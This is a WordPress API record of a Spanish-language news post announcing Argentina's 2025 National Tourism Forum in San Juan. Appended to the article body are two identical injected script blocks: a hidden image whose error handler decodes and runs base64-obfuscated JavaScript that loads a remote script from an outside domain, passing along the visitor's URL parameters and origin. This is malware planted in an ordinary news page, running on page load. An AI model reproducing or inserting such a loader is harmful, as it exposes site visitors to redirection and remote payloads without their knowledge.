{"id":5365,"date":"2025-07-24T20:49:30","date_gmt":"2025-07-24T23:49:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5365"},"modified":"2025-08-13T23:24:03","modified_gmt":"2025-08-14T02:24:03","slug":"el-foro-nacional-de-turismo-se-realizara-en-san-juan","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5365","title":{"rendered":"El Foro Nacional de Turismo se realizar\u00e1 en San Juan"},"content":{"rendered":"\n<p><strong><em>El gobernador Orrego y el secretario de Turismo, Ambiente y Deportes Daniel Scioli encabezaron la presentaci\u00f3n en la Casa de la Provincia en Buenos Aires.<\/em><\/strong><\/p>\n\n\n\n<p>El lanzamiento oficial del&nbsp;<a href=\"https:\/\/foronacionaldeturismo2025.com\/\">Foro Nacional de Turismo 2025<\/a>, que tendr\u00e1 lugar en&nbsp;<strong>San Juan el 4 y el 5 de septiembre<\/strong>, fue realizado en la Casa de la Provincia en Buenos Aires, con la presencia del gobernador,&nbsp;<strong>Marcelo Orrego<\/strong>, y del secretario de Turismo Ambiente y Deportes de la Naci\u00f3n,&nbsp;<strong>Daniel Scioli<\/strong>. Esta edici\u00f3n sesionar\u00e1 bajo el lema \u201c<strong>Transformando destinos: innovaci\u00f3n, tecnolog\u00eda y sostenibilidad para un turismo inteligente<\/strong>\u201d.<\/p>\n\n\n\n<p><strong>Scioli<\/strong>&nbsp;se\u00f1al\u00f3 que este foro \u201c<em>va a poner a la provincia de San Juan en el epicentro del turismo nacional<\/em>\u201d y detall\u00f3 que \u201c<em>participar\u00e1n m\u00e1s de 500 personas de todo el pa\u00eds, profesionales especializados en tem\u00e1ticas del sector, empresarios, acad\u00e9micos y todos los ministros de turismo del pa\u00eds<\/em>\u201d. \u201c<em>Vamos a estar ah\u00ed para reflexionar, compartir experiencias y organizarnos de cara a los nuevos desaf\u00edos que tenemos en la actividad<\/em>\u201d, puntualiz\u00f3.<\/p>\n\n\n\n<p>En ese marco, destac\u00f3 que \u201c<em>el presidente Javier Milei, no solo marc\u00f3 al turismo como una de las actividades estrat\u00e9gicas para la recuperaci\u00f3n del pa\u00eds, sino tambi\u00e9n ha tomado importantes decisiones, como la pol\u00edtica de cielos abiertos, desregulaciones o simplificaciones para favorecer el crecimiento del sector<\/em>\u201d. Al respecto, subray\u00f3 \u201c<em>la decisi\u00f3n de eliminar las visas que se ven\u00edan requiriendo a los turistas de pa\u00edses como China o Rep\u00fablica Dominicana, mercados con un enorme potencial<\/em>\u201d, finaliz\u00f3&nbsp;<strong>Scioli<\/strong>.<\/p>\n\n\n\n<p>Por su parte,&nbsp;<strong>Orrego<\/strong>&nbsp;plante\u00f3 que San Juan asume este compromiso como una decisi\u00f3n estrat\u00e9gica enmarcada en una pol\u00edtica de Estado, con el&nbsp;<strong>objetivo de posicionar el turismo como motor de desarrollo<\/strong>, junto a sectores tradicionales, como la miner\u00eda, la agroindustria, la producci\u00f3n de energ\u00edas limpias y la econom\u00eda del conocimiento.<\/p>\n\n\n\n<p>En ese contexto, el mandatario valor\u00f3 el trabajo conjunto con el Consejo Federal de Turismo (CFT) y record\u00f3 el momento en que San Juan ofreci\u00f3 ser sede del Foro. \u00ab<em>Esa charla con el secretario Scioli se transform\u00f3 en una oportunidad concreta y hoy celebramos el resultado<\/em>\u00ab, dijo.<\/p>\n\n\n\n<p>Adem\u00e1s,&nbsp;<strong>Orrego<\/strong>&nbsp;expres\u00f3 que la provincia no solo cuenta con recursos naturales, gastronom\u00eda y productos regionales para ofrecer, sino tambi\u00e9n con el compromiso de su gente para ser buenos anfitriones y hacer sentir a cada visitante como en casa.<\/p>\n\n\n\n<p>Este evento se ha consolidado como un&nbsp;<strong>espacio de encuentro para el intercambio y la articulaci\u00f3n entre los diversos actores y protagonistas del turismo argentino<\/strong>. Con una fuerte impronta federal y participativa, este a\u00f1o reunir\u00e1 a los principales referentes de los sectores p\u00fablico, privado, acad\u00e9mico y comunitario de todo el pa\u00eds, en un entorno pensado para el aprendizaje, la inspiraci\u00f3n y la construcci\u00f3n colectiva.<\/p>\n\n\n\n<p>Durante las jornadas se desarrollar\u00e1n&nbsp;<strong>charlas magistrales con expertos nacionales e internacionales, paneles tem\u00e1ticos, talleres participativos y espacios de vinculaci\u00f3n<\/strong>&nbsp;pensados para profundizar en los principales ejes del modelo de&nbsp;<em>Destinos Tur\u00edsticos Inteligentes: sostenibilidad, tecnolog\u00eda, innovaci\u00f3n, gobernanza y financiamiento<\/em>.<\/p>\n\n\n\n<p>Del lanzamiento tambi\u00e9n participaron el presidente del CFT,&nbsp;<strong>Valent\u00edn D\u00edaz Gilligan<\/strong>; el ministro de Turismo, Cultura y Deporte de San Juan,&nbsp;<strong>Guido Romero<\/strong>; el presidente de Fehgra,&nbsp;<strong>Fernando Desbots<\/strong>; el director nacional del CFT,&nbsp;<strong>Germ\u00e1n Bakker<\/strong>; y el ministro de Producci\u00f3n, Trabajo e Innovaci\u00f3n de San Juan,&nbsp;<strong>Gustavo Fern\u00e1ndez<\/strong>.<\/p>\n\n\n\n<p>El Foro Nacional de Turismo es organizado por el&nbsp;<strong>CFT<\/strong>, en conjunto con la&nbsp;<strong>Secretar\u00eda de Turismo, Ambiente y Deportes de la Naci\u00f3n<\/strong>&nbsp;y el&nbsp;<strong>Gobierno de la Provincia de San Juan<\/strong>&nbsp;y cuenta con el apoyo de la&nbsp;<strong>C\u00e1mara Argentina de Turismo<\/strong>.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El gobernador Orrego y el secretario de Turismo, Ambiente y Deportes Daniel Scioli encabezaron la presentaci\u00f3n en la Casa de la Provincia en Buenos Aires. El lanzamiento oficial del&nbsp;Foro Nacional de Turismo 2025, que tendr\u00e1 lugar en&nbsp;San Juan el 4 y el 5 de septiembre, fue realizado en la Casa de la Provincia en Buenos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5366,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21],"tags":[],"class_list":{"0":"post-5365","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5365"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5365"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5365\/revisions"}],"predecessor-version":[{"id":6431,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5365\/revisions\/6431"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5366"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5365"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5365"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5365"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}